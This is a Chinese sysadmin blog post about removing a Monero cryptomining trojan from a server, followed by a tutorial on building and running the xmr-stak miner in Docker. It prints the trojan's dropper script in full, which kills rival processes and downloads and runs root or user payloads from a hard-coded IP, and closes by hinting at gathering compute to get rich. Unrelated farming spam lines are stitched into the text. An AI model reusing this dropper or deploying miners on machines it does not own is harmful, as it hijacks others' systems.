作为一名运维工程师,保护自己的服务器责无旁贷,日常必须时刻注意不靠谱的开发、复杂的环境配置、随时可能出现的手残失误以及部分同事的入职删库跑路三部曲,还要随时防备着外部黑客带来的冲击。

最近我就遇到一个小小的麻烦,对方手段也并不高,很轻松就解决了。没想到的是在这个过程中,我居然还的发现了一条小小的致富道路。

起源

某天中午测试反馈说线上系统频繁的报502错误,并且响应极慢。

开始怀疑是公司哪位小哥在下载小电影,但打开其他网站都很快。于是继续怀疑难道是业务激增导致带宽被占满了,于是登录监控界面,显示只用了80Mb,带宽也没占满。

解决问题

ssh上服务器之后,本能的执行top命令,返现cranberry进程几乎把cpu吃满了。

蒜黄的种植效益_致富经蒜黄种植技术_致富经蒜黄种植新技术视频

于是尝试kill掉进程

kill -9 14465 

kill掉之后,cranberry又会立即自动重启。

在紧盯屏幕之后,惊喜的发现crontab进程。于是大喜过望,这哥们会啊。

于是查看crontab的列表

crontab -l 

看到如下命令,会通过定时任务去远程服务器下载脚本

蒜黄的种植效益_致富经蒜黄种植新技术视频_致富经蒜黄种植技术

于是把crontab的列表删掉

crontab -r 

然后,以为kill掉cranberry之后,就ok了,谁知道还是自动重启。

那只能耐着性子,把脚本下载下来研究一下了,脚本内容如下:

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
pkill -f jIuc2ggfCAvYmluL2Jhc2gi
pkill -f lowerv2.sh
pkill -f rootv2.sh
pkill -f sourplum
pkill -f nativesvc
ps aux | awk '{if($3>20.0) print $2}' | while read procid
do
kill -9 $procid
done
whoami=$( whoami )
if [ ${whoami}x != "root"x ];then
    curl http://172.96.252.86/lowerv3.sh > /tmp/lower.sh
    if [ ! -f "/tmp/lower.sh" ] ;then
        wget -P /tmp/ http://172.96.252.86/lowerv3.sh
        rm /tmp/lower.sh.*
    fi
    chmod 777 /tmp/lower.sh
    bash /tmp/lower.sh
else
    curl http://172.96.252.86/rootv3.sh > /etc/root.sh
    if [ ! -f "/etc/root.sh" ] ;then
        wget -O /etc/root.sh http://172.96.252.86/rootv3.sh
    fi
    chmod 777 /etc/root.sh
    bash /etc/root.sh
fi
echo "over" 

这脚本倒也简单,主要是下载另外一个脚本,到/etc/目录中,名字是root.sh.

于是查看是哪个进程执行了脚本:

root@SSP001:[/proc]ps -ef|grep root.sh
root      1541 28244  0 16:19 pts/1    00:00:00 grep root.sh
root      2036  1653  0 11:00 ?        00:00:57 bash /etc/root.sh
root      2080  1544  0 06:00 ?        00:01:21 bash /etc/root.sh
root      6035  5979  0 Jan15 ?        00:13:01 bash /etc/root.sh
root      8659  8156  0 05:00 ?        00:01:24 bash /etc/root.sh
root      9649  9627  0 Jan15 ?        00:07:03 bash /etc/root.sh
root      9979  9731  0 02:00 ?        00:03:12 bash /etc/root.sh
root     11925 11497  0 14:00 ?        00:00:16 bash /etc/root.sh
root     14874 14437  0 Jan15 ?        00:08:55 bash /etc/root.sh
root     14931 14794  0 Jan15 ?        00:12:22 bash /etc/root.sh
root     14935 13330  0 15:00 ?        00:00:00 bash /etc/root.sh
root     15050 14391  0 12:00 ?        00:00:32 bash /etc/root.sh
root     15596 15349  0 Jan15 ?        00:03:46 bash /etc/root.sh 

把上边的进程kill掉:

kill -9 2036 2080 6035 8659 9649 9979 11925 14874 14931 14935 15050 15596 16459 17199 19983 20478 20795 21609 21810 23402 24943 25513 27988 28883 29853 31304 31499 32364 

然后再kill掉cranberry:

killall -9 cranberry 

这次终于搞定了。不过仔细看了看,似乎还有几个挖矿木马,用同样的排查思路一个个干掉了。

致富之路的展开

搞定病毒之后,顺便研究了CPU挖矿工具,发现了 xmr-stak-cpu 这个东西。

上网搜了搜,找到了GITHUB上的主页,好像刚升级不久:github.com/fireice-uk/xmr-stak

还有个早先点的版本地址为:github.com/fireice-uk/xmr-stak-cpu

找了一台测试机安装一下试试:

# git clone https://github.com/fireice-uk/xmr-stak
# cd xmr-stak/
# ls
CI  CMakeLists.txt  CONTRIBUTING.md  doc  Dockerfile  LICENSE  README.md  scripts  THIRD-PARTY-LICENSES  xmrstak 

好像没有可以执行的文件,不过我发现了Dockerfile,然后又在 scripts文件夹里找到了build_xmr-stak_docker.sh 难道是自动创建一个docker 来挖矿?

打开来看看:

# vim scripts/build_xmr-stak_docker/build_xmr-stak_docker.sh
#!/bin/bash -uex
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root"
exit 1
fi
if [ -d xmr-stak ]; then
git -C xmr-stak clean -fd
else
git clone https://github.com/fireice-uk/xmr-stak.git
fi
wget -c https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run
chmod a+x cuda_*_linux-run
########################
# Fedora 27
########################
# CUDA is not going to work on Fedora 27 beacuse it's only support these distributions: http://docs.nvidia.com/cuda/cuda-installation-guide-linux/index.html
docker run --rm -it -v $PWD:/mnt fedora:27 /bin/bash -c "
set -x ;
dnf install -y -q cmake gcc-c++ hwloc-devel libmicrohttpd-devel libstdc++-static make openssl-devel;
cd /mnt/xmr-stak ;
cmake -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF . ;
make ;
"
test -d fedora_27 || mkdir fedora_27
mv xmr-stak/bin/* fedora_27
git -C xmr-stak clean -fd
########################
# Ubuntu (17.04)
########################
docker run --rm -it -v $PWD:/mnt ubuntu:17.04 /bin/bash -c "
set -x ;
apt update -qq ;
apt install -y -qq libmicrohttpd-dev libssl-dev cmake build-essential libhwloc-dev ;
cd /mnt/xmr-stak ;
/mnt/cuda_*_linux-run --silent --toolkit ;
cmake -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF . ;
... 

呵呵,果然不出所料,这个脚本针对 CentOS 和 Ubuntu系列linux系统自动创建建立一个Docker镜像然后安装xmr-stak 编辑一下这个脚本,只留下一个操作系统,我这里只留下了 Ubuntu 17部分。

原来的脚本是跑完了docker 安装完成就吧容器删掉,而我现在想把这个容器留下于是就改了改,最后变成下面这个样子:

#!/bin/bash -uex
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root"
exit 1
fi
if [ -d xmr-stak ]; then
git -C xmr-stak clean -fd
else
git clone https://github.com/fireice-uk/xmr-stak.git
fi
########################
# Ubuntu (17.04)
########################
docker run -itd --name "xmr" -v $PWD:/mnt ubuntu:17.04 /bin/bash
docker exec -it "xmr" /bin/bash -c "
set -x ;
apt update -qq
apt install -y -qq libmicrohttpd-dev libssl-dev cmake build-essential libhwloc-dev ;
cd /mnt/xmr-stak ;
cmake -DCUDA_ENABLE=OFF -DOpenCL_ENABLE=OFF . ;
make install; 

我的linux 不需要CUDA ,删掉 CUDA部分的代码。

直接执行(运行前请确定是否已经安装Docker):

# ./build_xmr-stak_docker.sh
+ [[ 0 -ne 0 ]]
+ '[' -d xmr-stak ']'
+ git clone https://github.com/fireice-uk/xmr-stak.git
Cloning into 'xmr-stak'...
git-remote-https: /usr/local/lib/libldap_r-2.4.so.2: no version information available (required by /usr/lib/x86_64-linux-gnu/lib
git-remote-https: /usr/local/lib/liblber-2.4.so.2: no version information available (required by /usr/lib/x86_64-linux-gnu/libcu
remote: Counting objects: 3441, done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 3441 (delta 16), reused 16 (delta 3), pack-reused 3409
Receiving objects: 100% (3441/3441), 1.01 MiB | 24.00 KiB/s, done.
Resolving deltas: 100% (2403/2403), done.
Checking connectivity... done.
+ docker run -itd --name xmr -v /data1/soft:/mnt update-ubuntu /bin/bash
f88a7614bd41821be42b584f76a1892184cd06155058c25c6bbdfb8c245cb571
+ docker exec -it xmr /bin/bash -c '
.....
#脚本里包含了 apt-get update 时间会比较久,如果你觉得不需要也可以去掉。如果上面这些步骤一切正常,那么就可以进入刚健的容器去试试挖矿了
# docker exec -it xmr /bin/bash
# cd /mnt/xmr-stak/bin/
# ls
libxmr-stak-backend.a  libxmr-stak-c.a  xmr-stak
# ./xmr-stak 
Please enter:
- Currency: 'monero' or 'aeon' 

上面是选择你想挖的币种类、矿池地址、钱包地址等等设置完之后会自动执行,如果出现下面这个就说明连接成功了,我测试用的是国内的一个门罗币矿池mine.ppxxmr.com:3333:

[2018-01-12 11:07:21] : Fast-connecting to mine.ppxxmr.com:3333 pool ...
[2018-01-12 11:07:21] : Pool mine.ppxxmr.com:3333 connected. Logging in...
[2018-01-12 11:07:21] : Difficulty changed. Now: 15000.
[2018-01-12 11:07:21] : Pool logged in.
[2018-01-12 11:07:29] : Difficulty changed. Now: 15000.
[2018-01-12 11:07:29] : New block detected.
[2018-01-12 11:07:37] : Result accepted by the pool.
[2018-01-12 11:07:47] : Result accepted by the pool.
[2018-01-12 11:08:04] : Difficulty changed. Now: 10465.
[2018-01-12 11:08:04] : New block detected.
[2018-01-12 11:08:11] : Result accepted by the pool.
[2018-01-12 11:08:17] : Result accepted by the pool. 

网站上也出现了你挖矿的进度,如下图:

终止进程后发现,bin下面多了两个文件 cpu.txt 和 config.txt:

# ls 
config.txt  cpu.txt  libxmr-stak-backend.a  libxmr-stak-c.a  xmr-stak 
打开来看看:
# vim config.txt 
/*
* pool_address    - Pool address should be in the form "pool.supportxmr.com:3333". Only stratum pools are supported.
* wallet_address  - Your wallet, or pool login.
* pool_password   - Can be empty in most cases or "x".
* use_nicehash    - Limit the nonce to 3 bytes as required by nicehash.
* use_tls         - This option will make us connect using Transport Layer Security.
* tls_fingerprint - Server's SHA256 fingerprint. If this string is non-empty then we will check the server's cert against it.
* pool_weight     - Pool weight is a number telling the miner how important the pool is. Miner will mine mostly at the pool
*                   with the highest weight, unless the pool fails. Weight must be an integer larger than 0.
*
* We feature pools up to 1MH/s. For a more complete list see M5M400's pool list at www.moneropools.com
*/
"pool_list" :
[
{"pool_address" : "mine.ppxxmr.com:3333", "wallet_address" : "xxxxxxxxxqC4PTWdaAZ3V15d83kCEEGRiXVXeQwsS1PGd7s7wDjigA2grkxcsDfxEDtuDomBzpFiGtNyPMy+$NUMBER", "pool_password" : "", "use_nicehash" : false, "use_tls" : false, "tls_fingerprint" : "", "pool_weight" : 1 },
],
/*
* currency to mine
* allowed values: 'monero' or 'aeon'
*/
"currency" : "monero",
/* 

内容比较多,刚才的设置应该都存在这里了。

# vim cpu.txt
...
"cpu_threads_conf" :
[
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 0 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 2 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 4 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 6 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 8 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 10 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 1 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 3 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 5 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 7 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 9 },
{ "low_power_mode" : false, "no_prefetch" : true, "affine_to_cpu" : 11 },
], 

cpu.txt是我们调整CPU使用效率的文件,如果觉得资源耗太多可以减少一些

好了,再次执行的时候就不用进行设置了。

# nohup ./xmr-stak &
[1] 714 

看一下资源消耗,瞬间就上10了哈哈,看看这点算力和这么高的负载,咱们就测测就得了。

致富经蒜黄种植技术_蒜黄的种植效益_致富经蒜黄种植新技术视频

不过要是想办法搞点算力,基本上致富之路就开始啦~

部分内容来自于51CTO博主feelgood3000和storysky


本文由转载于互联网,如有侵权请联系删除!